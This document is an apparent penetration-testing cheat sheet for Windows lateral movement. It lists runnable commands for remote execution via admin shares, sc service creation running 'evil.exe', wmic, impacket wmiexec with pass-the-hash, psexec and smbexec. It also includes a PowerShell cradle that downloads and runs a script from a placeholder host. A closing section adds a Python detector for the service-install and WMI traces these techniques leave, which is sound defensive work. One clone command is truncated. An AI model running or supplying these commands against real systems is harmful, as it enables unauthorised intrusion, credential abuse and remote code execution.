Domain environment setup
Reference: https://blog.csdn.net/niexinming/article/details/75650128
Enable the IPC$ and ADMIN$ shares

```cmd
net share ipc$
net share admin$
```
Run commands directly over the shares

```cmd
dir \\IP\c$
tasklist /S IP /U user /P password
```
sc

```cmd
sc \\[HOST] create boom binpath= c:\evil.exe
sc \\[HOST] start boom
sc \\[HOST] delete boom
```
wmic

```cmd
wmic /node:172.18.16.172 /user:admin /password:password process call create "cmd.exe /c ipconfig>c:\result.txt"
```
wmiexec.py
Install:

```bash
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
pip install .
```

Username and password

```bash
python wmiexec.py username:password@targetIP
```

Pass-the-hash

```bash
python wmiexec.py -hashes LMHash:NTHash domain/username@targetIP
```
wmiexec.vbs

```cmd
cscript.exe wmiexec.vbs /cmd 172.18.16.172 administrator password "command"
```
PowerShell tools
Invoke-WmiCommand.ps1 is a script from PowerSploit that executes commands remotely by calling WMI from PowerShell; underneath, it is still WMI doing the work.
Download: https://github.com/PowerShellMafia/PowerSploit

```powershell
git clone https:
cd PowerSploit-master\PowerSploit-master\CodeExecution
python -m SimpleHTTPServer
powershell IEX(New-Object Net.Webclient).DownloadString('http://xx.xx.xx.xx/Invoke-WmiCommand.ps1')
$User = "domain\username"
$Password = ConvertTo-SecureString -String "plaintext password" -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password
$Remote = Invoke-WmiCommand -Payload {command to run} -Credential $Cred -ComputerName targetIP
$Remote.PayloadOutput
```
Invoke-WMIMethod (no output echoed back)
Invoke-WMIMethod is a cmdlet built into PowerShell that can run commands and launch a given program on a remote system. Running the following from a PowerShell prompt executes the remote command non-interactively, but the result is not echoed back.

```powershell
$User="domain\username"   # username on the target system
$Password=ConvertTo-SecureString -String "password" -AsPlainText -Force   # password on the target system
$Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password   # combine account and password into a Credential object
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName "targetIP" -Credential $Cred   # run notepad.exe on the remote system
```
psexec

```cmd
psexec.exe \\ip -u account -p password cmd.exe /c ipconfig
```
smbexec
Source: https://github.com/SecureAuthCorp/impacket

```bash
smbexec.py username:password@IP
```
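Every technique above leaves a trace on the target: sc and psexec/smbexec register a service (System log Event ID 7045), while wmic, wmiexec and the two PowerShell cmdlets make WmiPrvSE.exe spawn the command (Sysmon Event ID 1). As an added example, not part of the original notes, the following Python detector runs those two checks over constructed event records; the hostnames, field names and sample events are assumptions made for the example.

```python
# Added example (not from the original notes): flag the traces left by the
# remote-execution techniques above. Event 7045 = service installed (System
# log); Sysmon event 1 = process creation. Records below are constructed.
import re

# Constructed sample events, shaped like parsed Windows/Sysmon log records.
EVENTS = [
    {"id": 7045, "host": "WS01", "ServiceName": "boom",
     "ImagePath": r"c:\evil.exe"},
    {"id": 7045, "host": "WS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 7045, "host": "DC01", "ServiceName": "gupdate",
     "ImagePath": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc"},
    {"id": 1, "host": "WS01",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c ipconfig>c:\result.txt"},
    {"id": 1, "host": "WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

# Service binaries a legitimate installer rarely registers: a bare executable
# in the root of a drive, or a cmd.exe one-liner used as the service image.
SUSPICIOUS_IMAGE = re.compile(r"^(?:[a-z]:\\[^\\]+\.exe|.*\\cmd\.exe\b.*)$", re.I)

def classify(event):
    """Return a short alert label for one event, or None if it looks benign."""
    if event["id"] == 7045:
        if event["ServiceName"].upper() == "PSEXESVC":
            return "psexec-service-install"
        if SUSPICIOUS_IMAGE.match(event["ImagePath"]):
            return "suspicious-service-binary"   # e.g. sc create ... binpath= c:\evil.exe
    elif event["id"] == 1:
        if event["ParentImage"].lower().endswith("\\wbem\\wmiprvse.exe"):
            return "wmi-spawned-process"          # wmic / wmiexec / Invoke-WmiCommand
    return None

def scan(events):
    """Run classify() over all events; return (host, label, detail) tuples."""
    alerts = []
    for ev in events:
        label = classify(ev)
        if label:
            alerts.append((ev["host"], label, ev.get("CommandLine") or ev["ImagePath"]))
    return alerts

if __name__ == "__main__":
    for host, label, detail in scan(EVENTS):
        print(f"{host}: {label}: {detail}")
```

The service-binary rule is deliberately narrow; in production it would be paired with an allow-list of known installers, since a root-of-drive executable is only one shape the `binpath=` argument can take.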
References
https://www.freebuf.com/articles/network/246440.html
https://cloud.tencent.com/developer/article/1752145